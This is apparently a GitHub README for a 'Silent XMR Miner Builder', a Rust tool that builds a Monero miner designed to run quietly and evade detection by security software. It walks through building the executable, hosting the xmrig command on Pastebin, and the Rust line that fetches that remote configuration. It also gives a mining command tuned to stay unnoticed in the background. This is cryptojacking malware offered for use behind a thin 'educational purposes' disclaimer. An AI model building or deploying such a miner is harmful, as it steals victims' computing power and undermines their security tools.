Skip to content

Latest commit

 

History

History
78 lines (57 loc) · 3.13 KB

README.md

File metadata and controls

78 lines (57 loc) · 3.13 KB

Silent XMR Miner Builder

Welcome to the Silent XMR Miner Builder! This tool lets you create a silent miner for Monero (XMR), which runs quietly in the background and is designed to avoid detection by security software. The builder allows you to customize and build your own miner executable, which you can configure to mine using your specific xmrig commands.

Features:

Prerequisites:

To build and run this project, you need to have Rust installed.

Installing Rust:

  1. Download and Install Rust:
    • Go to the official Rust installation page: https://www.rust-lang.org/tools/install.
    • Follow the instructions for your operating system. Rust can be installed via rustup, a tool that helps manage Rust versions and associated tools.

Verify Installation:

After installation, check that Rust is installed properly by running this command:

rustc --version

You should see something like this:

rustc 1.65.0 (897e37553 2022-11-02)

Clone the Repository:

First, clone this repository to your local machine using Git and navigate into the project directory.

git clone https://github.com/yourusername/silent-xmr-miner.git
cd silent-xmr-miner

Create Your Pastebin:

Go to Pastebin and create a new paste with your XMRig mining command. This will include things like the pool address and your wallet address. Once your paste is created, copy the raw URL. For example, your URL might look like this: https://pastebin.com/raw/yourpastebinid command should look like this

-o xmr-eu1.nanopool.org:10343 -a rx -k --tls -u youraddress.nameyouwant -p x --cpu-priority 1 --cpu-max-threads-hint 45 --randomx-mode light --donate-level 0 --background --cpu-affinity 1 --max-cpu-usage 35

Update the Code:

Open the source code file and replace the URL in the specified line with your own Pastebin link.

let process_config = client.get("https://pastebin.com/raw/yourpastebinid")
    .send()
    .unwrap()
    .text()
    .unwrap_or_default();

Build the Project:

In the terminal, inside the project directory, run the build command to compile the project in release mode.

cargo build --release

A Few Important Things to Keep in Mind:

  • Customization: Make sure your Pastebin contains the correct configuration for XMRig to mine with your pool address and wallet.
  • Be Responsible: Only use this tool on systems where you have permission to run mining software.

Disclaimer:

This tool is provided as-is, and it’s for educational purposes only. Please use it responsibly and make sure you have permission to mine on the system you’re using.